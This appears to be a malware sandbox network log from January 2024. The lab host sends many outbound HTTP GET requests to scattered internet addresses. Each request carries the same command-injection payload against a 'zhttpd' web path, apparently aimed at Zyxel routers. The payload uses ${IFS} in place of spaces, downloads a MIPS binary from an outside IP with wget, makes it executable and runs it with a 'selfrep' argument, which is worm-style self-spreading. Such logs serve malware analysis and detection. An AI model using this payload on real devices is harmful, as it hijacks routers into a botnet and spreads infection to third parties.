                                                  Jan 19, 2024 18:23:50.955353975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3162192.168.2.135925632.116.219.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955385923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3163192.168.2.1346634187.204.119.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955425024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3164192.168.2.134768067.106.123.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955456972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3165192.168.2.1353220176.240.47.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955491066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3166192.168.2.1340060191.48.153.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955554008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3167192.168.2.133756848.18.161.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955579996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3168192.168.2.134436443.29.120.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955614090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3169192.168.2.1358974178.9.166.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955687046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3170192.168.2.134640274.208.239.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955718994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3171192.168.2.1341222186.22.148.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955771923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3172192.168.2.1347504126.157.139.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955807924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3173192.168.2.133883442.147.228.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955832958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3174192.168.2.134282296.168.152.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955866098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3175192.168.2.1334896143.44.192.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955904961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3176192.168.2.1343848139.0.122.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955941916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3177192.168.2.1346736144.26.167.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955986023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3178192.168.2.1355378216.205.159.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956017971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3179192.168.2.1356768143.152.2.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956053019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3180192.168.2.1342484175.81.184.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956093073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3181192.168.2.1334412109.195.96.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956140995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3182192.168.2.135146480.40.187.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956167936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3183192.168.2.1356560154.20.41.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956212044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3184192.168.2.1339362125.146.138.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956249952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3185192.168.2.1354024155.4.52.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956281900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3186192.168.2.1350718184.136.66.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956325054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3187192.168.2.1358502178.202.248.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956363916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3188192.168.2.1334168166.223.143.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956393003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3189192.168.2.1345522161.61.144.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956417084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3190192.168.2.1342046166.55.12.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956435919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3191192.168.2.1341044150.204.30.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956496954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3192192.168.2.135327695.135.156.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956521034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3193192.168.2.1336404218.14.218.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956564903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3194192.168.2.1344730212.102.241.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956597090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3195192.168.2.1357270220.184.35.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956640959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3196192.168.2.1358988119.58.217.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956700087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3197192.168.2.1335870178.10.114.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956749916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3198192.168.2.1349480158.212.33.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956792116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3199192.168.2.133971451.122.122.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956820965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3200192.168.2.134599644.47.0.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956881046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3201192.168.2.134273491.127.222.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956919909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3202192.168.2.1358072110.209.84.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.956944942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3203192.168.2.1340308179.58.180.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957003117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3204192.168.2.135488666.71.127.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957046986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3205192.168.2.1333920181.153.188.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957077026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3206192.168.2.134077417.250.47.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957123995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3207192.168.2.1348278221.67.8.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957150936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3208192.168.2.13407009.100.38.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957189083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3209192.168.2.1344546162.215.241.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957209110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3210192.168.2.133993059.45.137.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957261086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3211192.168.2.135720020.50.253.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957289934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3212192.168.2.1341694183.131.193.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957351923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3213192.168.2.1360754180.145.225.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957400084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3214192.168.2.134221412.135.201.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957444906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3215192.168.2.1353558167.182.255.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957475901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3216192.168.2.1358160160.123.247.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957509995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3217192.168.2.135959482.219.172.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957532883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3218192.168.2.1339190118.56.59.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957592964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3219192.168.2.13543681.123.99.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957633018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3220192.168.2.133863479.134.48.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957665920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3221192.168.2.1351636192.22.126.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957693100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3222192.168.2.1343292195.146.64.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957740068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3223192.168.2.133822492.134.255.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957766056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3224192.168.2.135487474.224.61.89443
                                                  TimestampBytes transferredDirectionData
